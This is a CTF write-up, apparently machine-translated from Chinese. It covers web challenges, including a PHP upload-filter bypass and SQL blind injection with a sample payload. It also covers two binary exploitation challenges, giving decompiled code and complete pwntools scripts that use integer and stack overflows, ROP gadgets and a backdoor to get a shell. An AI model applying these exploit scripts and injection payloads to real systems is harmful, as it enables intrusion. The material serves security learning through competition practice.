food

WEB

Ez to getflag

• Can upload files , And the uploaded file must be png picture , Only check the file name suffix
• Filter php character , Use short labels to bypass .
• Echo when looking for the file path ,
• There may be a File Inclusion Vulnerability .
• Read from the root directory /flag.
• Be misled , It was originally thought to be file upload , Later, it was found that it was file reading

After the game

Absolute defense

• open , It was found that it was a static picture
• Grab the bag , a pile js Files and pictures , Both in /static/ Under the table of contents
• Find user controllable points , stay js Document search web Interface . The official gave jsfinder This tool
• find SUPPSERAPI.php By looking at the source code, you can find that there is a connection between id Parameters are limited ,sql Inject and then bypass the restrictions
• var reg = /[`[email protected]#$%^&*()_+<>?:"{},./;'[]]/im
• Direct blind annotation script id=1 and ascii(substr((select database()),1,1))>12

PWN

• checksec

ez_for

int __cdecl main(int argc, const char **argv, const char **envp)
{
    
  __int64 v4; // [rsp+8h] [rbp-38h] BYREF
  char buf[36]; // [rsp+10h] [rbp-30h] BYREF
  unsigned int seed; // [rsp+34h] [rbp-Ch]
  int i; // [rsp+38h] [rbp-8h]
  int v8; // [rsp+3Ch] [rbp-4h]

  init(argc, argv, envp);
  puts("go");
  seed = 10;
  read(0, buf, 0x30uLL);
  srand(seed);
  v8 = 0;
  for ( i = 0; i <= 3; ++i )
  {
    
    puts("message:");
    __isoc99_scanf("%ld", buf);
    if ( (char *)rand() != buf )
      ++v8;
  }
  if ( v8 == 4 )
    __isoc99_scanf("%ld", &v4);
  return vul((unsigned int)v4);
}

//vul
int __fastcall vul(unsigned int a1)
{
    
  int result; // eax
  char nbytes[52]; // [rsp+Ch] [rbp-34h] BYREF

  result = system("date");
  if ( (int)a1 <= 47 )
  {
    
    read(0, &nbytes[4], a1);
    return (unsigned int)strncpy(buf, &nbytes[4], 0x200uLL);
  }
  return result;
}

• Integer overflow ,v4 stay main Is defined as int64 stay vul But in the middle unsigned int, When entering a negative number, the existence of sign bits causes the value to become larger ,read Larger number of .
• So there is stack overflow , Yes system, nothing /bin/sh
• srand(seed Pseudo random number )
• Use ideas ·

 First bypass random number comparison 
 Pass in a negative number , Integer overflow , Because the comparison is int a1, Passed in as unsigned a1, That is, you can compare and pass in a larger data 
 write in payload, Overwrite return address , At the same time, write the back door , Copied to the buf paragraph , That is, our parameter address 

from pwn import *
context(log_level="debug",arch="amd64")
io = process("./pwn4")
elf = ELF("./pwn4")
io.sendlineafter(b"go\n",b"1")
for i in range(4):		# Satisfaction is not equal to 
	io.sendlineafter(b"message:",b"1")
#v4 Integer overflow of 
io.sendline(b"-1")
#payload structure 
sys_plt = elf.plt['system']
#ROPgadget --binary "pwn4" --only "pop|ret"
rdi_addr = 0x400983
#bss Part of the buf Address 
buf_addr = 0x06010C0
shell = b'/bin/sh\x00'
# Overflow length , Because the output is char byte[4]
payload = shell.ljust(0x38,b"a")
# After several mistakes, I thought about stack alignment 
#ROPgadget --binary "pwn4" --only "ret"
ret_addr = 0x40063e
payload += p64(ret_addr)+p64(rdi_addr)+p64(buf_addr)+p64(sys_plt)
io.sendline(payload)

io.interactive()

Mycanary2

• checksec

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

• Disassembly

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
    
  rand_fd();
  start_main(a1, a2);
  return 0LL;
}

rand_fd
unsigned int rand_fd()
{
    
  int v0; // eax
  int fd; // [rsp+Ch] [rbp-4h]

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  fd = open("/dev/urandom", 0);
  if ( fd == -1 )
  {
    
    printf("can't open /dev/urandom");
    exit(-1);
  }
  read(fd, &qword_4040D0, 8uLL);
  close(fd);
  v0 = time(0LL);
  srand(v0 ^ qword_4040D0);
  return alarm(0x14u);
}

//vul_func
__int64 start_main()
{
    
  __int64 result; // rax
  char buf[88]; // [rsp+0h] [rbp-70h] BYREF
  __int64 v2; // [rsp+58h] [rbp-18h]
  int v3; // [rsp+68h] [rbp-8h]
  int v4; // [rsp+6Ch] [rbp-4h]

  v4 = 0;
  qword_4040D0 = (__int64)rand() << 32;  // Move left 32 position 
  qword_4040D0 += rand();
  v2 = qword_4040D0;
  puts("I have a secret. Can you find it?");
  while ( !v4 )
  {
    
    menu();
    v3 = input_num();
    switch ( v3 )
    {
    
      case 2:
        printf("My secret is %016lx\n", qword_4040D0);
        qword_4040D0 = (__int64)rand() << 32;
        qword_4040D0 += rand();                 //  After reading a random number, it will become a random number 
        v2 = qword_4040D0;
        printf("But now, I have a new Secret.");
        break;
      case 3:
        v4 = 1;
        break;
      case 1:
        puts("Show me the code:");
        read(0, buf, 0x100uLL);
        break;
    }
  }
  result = qword_4040D0;
  if ( v2 != qword_4040D0 )
  {
    
    printf("Hey, What are you doing?");
    exit(0);
  }
  return result;
}

• Program analysis

 In vulnerable functions , We enter a number 
1. Enter a maximum length of 0x100 The data of   ---  Stack overflow 
2. Random number v2 Assigned to another random number   ---  Print out random numbers , But it will change into another random number 
3.v4=1, Exit procedure 

• Use ideas ： Because random numbers qword_4040d0 stay bss paragraph , We can't change this number . We can overwrite the return address first , In the input 2 Back to the v2 assignment , such v2==qword_4040d0 Is established . meanwhile , When covering, make sure v4==0(v4 The address in var_4)
• 
• There are backdoor functions , By looking for /bin/sh Find the approximate location , Look in the compilation

from pwn import *

io = process("./MyCanary2")
context(arch="amd64",log_level="debug")
shell_addr = 0x401573
# Consider stack alignment 
ret_addr = 0x40101a
# Because to make sure v4==0, So use it directly \x00 Cover 
payload = b"\x00"*(0x70+8)+p64(ret_addr)+p64(shell_addr)
# Or to be precise 
#payload=(0x70-8)*b'a'+p64(0)+b"a"*0x8+p64(ret_addr)+p64(shell_addr)
io.sendlineafter(b"Input your choice\n",b"1")
io.sendline(payload)
io.sendlineafter(b"Input your choice\n",b"2")
io.sendlineafter(b"Input your choice\n",b"3")

io.interactive()

• The official answer is right rand() Function source code is analyzed and random numbers are inferred . And only Input 1( Overwrite the original value ),3( sign out ) Two Numbers , This may be the point that the official really wants to investigate .

official wp Address ： Click on
Reference blog ： Address

Summary after the game

 The level can be said to be very good 
 I hope I can calm down , Analyze slowly , Don't be impatient .
 The goal is to learn something through the competition , Slowly qualitative change .

• Understand integer overflow (unsigned) int that unsigned The sign bits of negative numbers will be calculated as data , As a result, a negative number may be very large
• Stack balance considerations , Stack as 0x10 Integer multiple , Add a return address .